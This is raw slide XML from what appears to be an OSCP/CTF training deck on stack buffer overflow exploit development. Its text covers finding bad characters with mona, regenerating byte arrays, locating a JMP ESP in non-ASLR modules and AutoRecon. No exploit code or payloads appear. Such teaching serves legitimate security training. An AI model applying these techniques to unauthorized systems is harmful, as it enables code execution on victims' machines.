              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F20E898-431C-497F-9355-E3755F8FE152}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4403812" y="1627901"/>
            <a:ext cx="4500500" cy="1311268"/>
            <a:chOff x="7320136" y="3773916"/>
            <a:chExt cx="4500500" cy="1311268"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{112EFE05-781F-43B4-B5F9-01E1C076BC65}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7320136" y="4185084"/>
              <a:ext cx="4500500" cy="900100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1824EF1F-AFDE-4C54-9754-E9B5719FE5BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7360302" y="4284315"/>
              <a:ext cx="1508006" cy="2608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854454D1-A6B2-4B09-9511-6952930F00ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8616280" y="3773916"/>
              <a:ext cx="14029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Stack pane:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BD91101-FE22-4CBF-A0D8-F57C88380D70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="254918" y="2015941"/>
            <a:ext cx="3752850" cy="409575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{061E0FBB-DF75-448A-B0E8-A523CC1B804D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181665" y="2536888"/>
            <a:ext cx="40421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!mona compare -&lt;path/to/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>bytearray.bin</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&gt; -a &lt;memory address to look at&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC49F5E4-54E5-4CEE-82C8-9D3DE41C412E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect b="74468"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="332407" y="3514774"/>
            <a:ext cx="5316480" cy="1730523"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E725134-5624-43AB-9F1A-71E78986F4AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="63611"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5951984" y="3712260"/>
            <a:ext cx="5277412" cy="2448272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D48FFC9E-B96B-4D68-8637-F42A06CFAB16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="361685" y="5247282"/>
            <a:ext cx="40421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&lt;SNIP&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3CC5DD4-9052-4853-84AA-C43570353128}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5951984" y="5725547"/>
            <a:ext cx="3869880" cy="3475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B85DC32E-EDB0-4776-864F-88DED958F3AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2202728" y="4170284"/>
            <a:ext cx="616908"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80E53E26-177B-41C3-8910-C48C01F83A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4007768" y="4680341"/>
            <a:ext cx="612068" cy="3926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Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09B3648D-74C1-4955-BEC7-EEA9054A5C88}"/>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Finding Bad Characters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174358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F17E81-C663-453B-96B1-B4D889CD9A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A695B74-E1CE-4755-B0F8-CF67FF9CA873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AutoRecon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>LINK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CD81754-E5D1-450B-AC7D-E31E1AA837D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="5827436" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fantastic tool for OSCP and CTFs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fire and forget, then examine results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other options exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses TOML files for configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Customize to fit your needs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creates well-organized output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Includes a file with the exact commands run</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC829CB8-365B-4157-AFD2-474108507AA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6036064" y="953296"/>
            <a:ext cx="5444982" cy="1526900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4F444CC-76BB-4732-8ED2-A1319585C3B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect b="52483"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6036063" y="2884086"/>
            <a:ext cx="5444984" cy="1623356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{245A86A0-84F7-4333-B306-5FC725CA4999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect b="31486"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="4911333"/>
            <a:ext cx="11098174" cy="1302534"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35C86D4B-E31F-4942-AD2F-873F9F21F2AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9263179" y="618985"/>
            <a:ext cx="2249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Note: this is an alias</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388492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40D82A-7665-4D5A-97BD-0E78EE66431A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4924556" y="2289757"/>
            <a:ext cx="6840956" cy="1023947"/>
            <a:chOff x="303505" y="1034558"/>
            <a:chExt cx="6840956" cy="1023947"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB28312-05FA-4099-8CB1-65AA620BFBD6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="303505" y="1034558"/>
              <a:ext cx="2916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Generate a new byte array</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86CA71AF-1BB3-43A0-8E90-61A197258AE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="347521" y="1422947"/>
              <a:ext cx="6796940" cy="635558"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{391B73D4-C650-4CDD-9192-213770017479}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1595500" y="3791850"/>
            <a:ext cx="6962493" cy="2368682"/>
            <a:chOff x="186927" y="2229986"/>
            <a:chExt cx="6962493" cy="2368682"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A17267C-7FC5-486E-A231-8C52A9A7649D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="303505" y="2596422"/>
              <a:ext cx="6845915" cy="2002246"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C17FE600-BA28-407C-ABED-460969C8F53B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="186927" y="2229986"/>
              <a:ext cx="2364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Then, compare again</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5521B79D-D925-4D88-949B-5D758C7FFFC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="415380" y="962929"/>
            <a:ext cx="4247371" cy="2635423"/>
            <a:chOff x="7706654" y="2535925"/>
            <a:chExt cx="4247371" cy="2635423"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66640C5B-A609-49A8-A6D1-AA8029E09304}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7717762" y="3169102"/>
              <a:ext cx="4236263" cy="2002246"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1222E7B4-ABF3-4C1F-9B98-DB8A1F79430F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7706654" y="2535925"/>
              <a:ext cx="42473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Update the exploit by removing bad chars</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{052B8012-17EA-43D7-B172-53F1BDEC563C}"/>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Re-run without Bad Characters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="705807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AB28312-05FA-4099-8CB1-65AA620BFBD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335360" y="1343823"/>
            <a:ext cx="113772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Note: This example requires JMP ESP. More complex cases may rely on finding other registers to use, like EAX. The goal is to find a way to execute the memory location with your shell code. Since the ESP points to the top of the stack and we added the payload after the return address, we want the ESP here.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A76A5208-04D3-461C-A076-7D8A36D51B63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="411946" y="3114675"/>
            <a:ext cx="4610107" cy="628651"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52D22824-8739-4CB7-8CF7-888510C7FBFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335360" y="2529900"/>
            <a:ext cx="87489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6E6E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Find modules without ASLR enabled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B561A4D-C964-458D-AA0B-7564BBE5BED9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="411946" y="4112658"/>
            <a:ext cx="11513982" cy="1246248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFE48D07-FFEE-475A-BF60-7147EEC55431}"/>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 a JMP ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3583894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D22824-8739-4CB7-8CF7-888510C7FBFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335360" y="2621059"/>
            <a:ext cx="96490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Find the assembly instructions (in this case, JMP ESP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A051C22-E073-4D15-805B-D9B9F65BB893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="447674" y="3083172"/>
            <a:ext cx="6203943" cy="1317936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A094BB89-9095-4735-AD69-8EA0C066BEC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335360" y="1343823"/>
            <a:ext cx="113772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Note: This example requires JMP ESP. More complex cases may rely on finding other registers to use, like EAX. The goal is to find a way to execute the memory location with your shell code. Since the ESP points to the top of the stack and we added the payload after the return address, we want the ESP here.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D9C758E-ED50-4EDB-897E-F15453125A54}"/>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 a JMP ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
